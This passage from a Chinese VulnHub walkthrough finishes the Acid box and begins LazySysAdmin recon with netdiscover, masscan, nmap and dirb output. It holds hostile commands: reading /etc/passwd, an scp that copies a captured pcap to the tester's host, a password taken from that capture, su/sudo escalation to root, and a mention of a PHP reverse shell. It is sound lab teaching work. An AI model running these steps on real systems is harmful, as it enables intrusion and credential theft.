/tmp/asdf.py</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><p>执行su成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8282' class='md-header-anchor '></a>提升权限</h2><ul><li>步骤10:查看有哪些的用户 <code>cat /etc/passwd</code>,发现需要关注的用户有:acid,saman,root</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/26.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤11:查找每个用户的文件(不显示错误) <code>find / -user acid 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/27.png' alt='' referrerPolicy='no-referrer' /></p><p>发现/sbin/raw_vs_isi/hint.pcapng文件,这是一个网络流量抓包文件,将其拷贝的kali上,用Wireshark打开:</p><p><code>scp /sbin/raw_vs_isi/hint.pcapng root@10.10.10.140:/root/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/28.png' alt='' referrerPolicy='no-referrer' /></p><p>只看TCP协议的包,发现saman的密码:1337hax0r</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/29.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤12:su提权到saman、root,获得flag</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/30.png' alt='' referrerPolicy='no-referrer' /></p><p>再使用sudo -i 提权到root,密码同样是1337hax0r,获得位于root目录的flag.txt。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/31.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8316' class='md-header-anchor '></a>靶场思路回顾</h2><p>作者的设计思路可参考国外的一篇渗透文章:
<code>http://resources.infosecinstitute.com/acid-server-ctf-walkthroug</code>h
主要突破点是:</p><p>1.两次目录暴破,第一次暴破出challenge,目录、cake.php、include.php、hacked.php,第二次暴破Magic_Box目录发现command.php。</p><p>2.发现命令执行界面后,用php反弹shell,在http中传输需对payload进行url编码。</p><p>3.su提权需要一个终端,没有经验只能Google解决了。</p><p>4.提权的方法是通过查找已知用户的文件,发现其密码,未使用exp或msf提权。</p><h2><a name='header-n8329' class='md-header-anchor '></a>思路总结</h2><p> </p><h3><a name='header-n8333' class='md-header-anchor '></a>主要收获</h3><ol start='' ><li>命令执行漏洞可使用php反弹shell, 以前都是用bash或nc。</li><li>su提权需要一个终端,使用Python解决。</li><li>获得shell后,多多查找各个用户文件,可能有新发现。</li></ol><h3><a name='header-n8344' class='md-header-anchor '></a>踩到的坑</h3><ol start='' ><li>文件包含漏洞,没找到利用方式,也找不到上传点,无法包含获得shell;</li><li>su提权需要一个终端,没有知识储备和经验,依靠高手指导和Google搜索解决。</li><li>index.php页面获得邮件用户名和密码的方法太冷门了,如果不是看国外的教程,自己无法想到。</li><li>发现目录就暴破下,使用御剑默认字典不行,只能使用OWASP的暴破字典,目录暴破绕过了上面邮件用户名和口令的登录,可以一路暴破到命令执行页面。</li></ol><p>总之,在没有google搜索和他人的指导下,自己没能独立完成,后续需要开阔思路,多多练习。</p><p> </p><h1><a name='header-n8362' class='md-header-anchor '></a>第五节 LazySysAdmin: 1</h1><h2><a name='header-n8364' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n8365' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip' target='_blank' class='url'>https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip</a></p><h3><a name='header-n8368' class='md-header-anchor '></a>运行环境</h3><ul><li>Virtualbox (二选一)</li><li>Vnware Workstation player</li></ul><h3><a name='header-n8376' class='md-header-anchor '></a>通关提示</h3><ul><li>Enumeration is key</li><li>Try Harder</li><li>Look in front of you</li><li>Tweet @togiemcdogie if you need more hints</li></ul><h2><a name='header-n8390' class='md-header-anchor '></a>信息收集</h2><h3><a name='header-n8391' class='md-header-anchor '></a>ip发现</h3><p>在内网主机探测中,可以使用netdiscover来进行。</p><p>netdiscover -i wlo1</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 netdiscover <span class="cm-attribute">-i</span> wlo1</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Currently scanning: <span class="cm-number">192</span>.168.21.0/16   |   Screen View: Unique Hosts             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                                                                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">1</span> Captured ARP Req/Rep packets, from <span class="cm-number">1</span> hosts.   Total size: <span class="cm-number">42</span>                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> _____________________________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-attribute">-----------------------------------------------------------------------------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">192</span>.168.0.100   <span class="cm-number">08</span>:00:27:da:8a:ac      <span class="cm-number">1</span>      <span class="cm-number">42</span>  PCS Systemtechnik GmbH</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 215px;"></div><div class="CodeMirror-gutters" style="display: none; height: 245px;"></div></div></div></pre><h3><a name='header-n8397' class='md-header-anchor '></a>端口扫描</h3><p>使用masscan扫描</p><p>masscan 192.168.0.100 -p 1-10000 --rate=1000</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 masscan <span class="cm-number">192</span>.168.0.100 <span class="cm-attribute">-p</span> <span class="cm-number">1</span><span class="cm-attribute">-10000</span> <span class="cm-attribute">--rate</span><span class="cm-operator">=</span><span class="cm-number">1000</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting masscan <span class="cm-number">1</span>.0.3 (http://bit.ly/14GZzcT) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span class="cm-number">12</span>:53:27 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-attribute">--</span> forced options: <span class="cm-attribute">-sS</span> <span class="cm-attribute">-Pn</span> <span class="cm-attribute">-n</span> <span class="cm-attribute">--randomize-hosts</span> <span class="cm-attribute">-v</span> <span class="cm-attribute">--send-eth</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating SYN Stealth Scan</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Scanning <span class="cm-number">1</span> hosts [10000 ports/host]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100                                   </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100                                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100                                   </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 284px;"></div><div class="CodeMirror-gutters" style="display: none; height: 314px;"></div></div></div></pre><p>使用nmap扫描</p><p>nmap -T4 -A -v 192.168.0.100 -p 0-10000</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 nmap <span class="cm-attribute">-T4</span> <span class="cm-attribute">-A</span> <span class="cm-attribute">-v</span> <span class="cm-number">192</span>.168.0.31 <span class="cm-attribute">-p0-10000</span>        </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting Nmap <span class="cm-number">7</span>.50 ( https://nmap.org ) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span class="cm-number">20</span>:55 CST</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">PORT     STATE SERVICE     VERSION</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">22</span>/tcp   open  <span class="cm-builtin">ssh</span>         OpenSSH <span class="cm-number">6</span>.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol <span class="cm-number">2</span>.0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| ssh-hostkey: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">1024</span> b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">2048</span> <span class="cm-number">58</span>:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">256</span> <span class="cm-number">61</span>:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  <span class="cm-number">256</span> 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">80</span>/tcp   open  http        Apache httpd <span class="cm-number">2</span>.4.7 ((Ubuntu))</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-generator: Silex v2.2.7</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-methods: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  Supported Methods: GET HEAD POST OPTIONS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-robots.txt: <span class="cm-number">4</span> disallowed entries </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_/old/ /test/ /TR2/ /Backnode_files/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-server-header: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-title: Backnode</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">139</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">3</span>.X <span class="cm-attribute">-</span> <span class="cm-number">4</span>.X (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">445</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">4</span>.3.11-Ubuntu (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">3306</span>/tcp open  mysql       MySQL (unauthorized)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">6667</span>/tcp open  irc         InspIRCd</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| irc-info: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   server: Admin.local</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   users: <span class="cm-number">1</span>.0</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   servers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   chans: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lusers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lservers: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> ident: nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> host: <span class="cm-number">192</span>.168.2.107</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  error: Closing link: (nmap@192.168.2.107) [Client exited]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">MAC Address: <span class="cm-number">08</span>:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Device type: general purpose</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Running: Linux <span class="cm-number">3</span>.X|4.X</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS details: Linux <span class="cm-number">3</span>.2 <span class="cm-attribute">-</span> <span class="cm-number">4</span>.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Uptime guess: <span class="cm-number">0</span>.008 days (since Wed Jan <span class="cm-number">31</span> <span class="cm-number">20</span>:44:16 <span class="cm-number">2018</span>)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Network Distance: <span class="cm-number">1</span> hop</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TCP Sequence Prediction: <span class="cm-def">Difficulty</span><span class="cm-operator">=</span><span class="cm-number">261</span> (Good luck!)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">IP ID Sequence Generation: All zeros</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Host script results:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Names:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<00>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<03>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<20>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   WORKGROUP<00>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  WORKGROUP<1e>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-os-discovery: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   OS: Windows <span class="cm-number">6</span>.1 (Samba <span class="cm-number">4</span>.3.11-Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Computer name: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   NetBIOS computer name: LAZYSYSADMIN\x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Domain name: \x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   FQDN: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  System time: <span class="cm-number">2018</span><span class="cm-attribute">-01-31T22</span>:55:23<span class="cm-operator">+</span><span class="cm-number">10</span>:00</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-security-mode: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   account_used: guest</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   authentication_level: user</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   challenge_response: supported</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  message_signing: disabled (dangerous, but default)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_smbv2-enabled: Server supports SMBv2 protocol</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TRACEROUTE</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HOP RTT     ADDRESS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">1</span>   <span class="cm-number">0</span>.50 ms LazySysAdmin.lan (192.168.0.100)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NSE: Script Post-scanning.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Read data files from: /usr/bin/../share/nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Nmap <span class="cm-keyword">done</span>: <span class="cm-number">1</span> IP address (1 host up) scanned <span class="cm-keyword">in</span> <span class="cm-number">31</span>.19 seconds</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           Raw packets sent: <span class="cm-number">11045</span> (487.680KB) | Rcvd: <span class="cm-number">11034</span> (442.816KB)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 2032px;"></div><div class="CodeMirror-gutters" style="display: none; height: 2062px;"></div></div></div></pre><p>对比可发现masscan扫描端口的速度比nmap快很多,但是想要知道端口所运行服务的具体信息,就要用到nmap了。根据扫描结果可知目标机开启了22、80、139、445、3306、6667这几个端口。</p><p>先从web入手,使用dirb来爆破目标存在的目录(dirb安装方法附在文章最后)</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 ./dirb http://192.168.0.100 wordlists/common.txt <span class="cm-attribute">-o</span> /home/evilk0/Desktop/result.txt</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">用法:./dirb 目标url 用于爆破的目录  <span class="cm-attribute">-o</span> 输出文件</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>在工具扫描的同时,手工探测漏洞利用点。访问目标web服务,未发现什么,查看是否存在robots.txt发现4个目录,并且存在目录遍历漏洞,但是并没用获取到可以利用的信息。</p><p><a href='http://192.168.0.100/robots.txt' target='_blank' class='url'>http://192.168.0.100/robots.txt</a></p><pre class="md-fences md-end-block" lang="http"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-error">User-agent: *</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /old/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /test/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /TR2/</span></span></pre><pre class=" 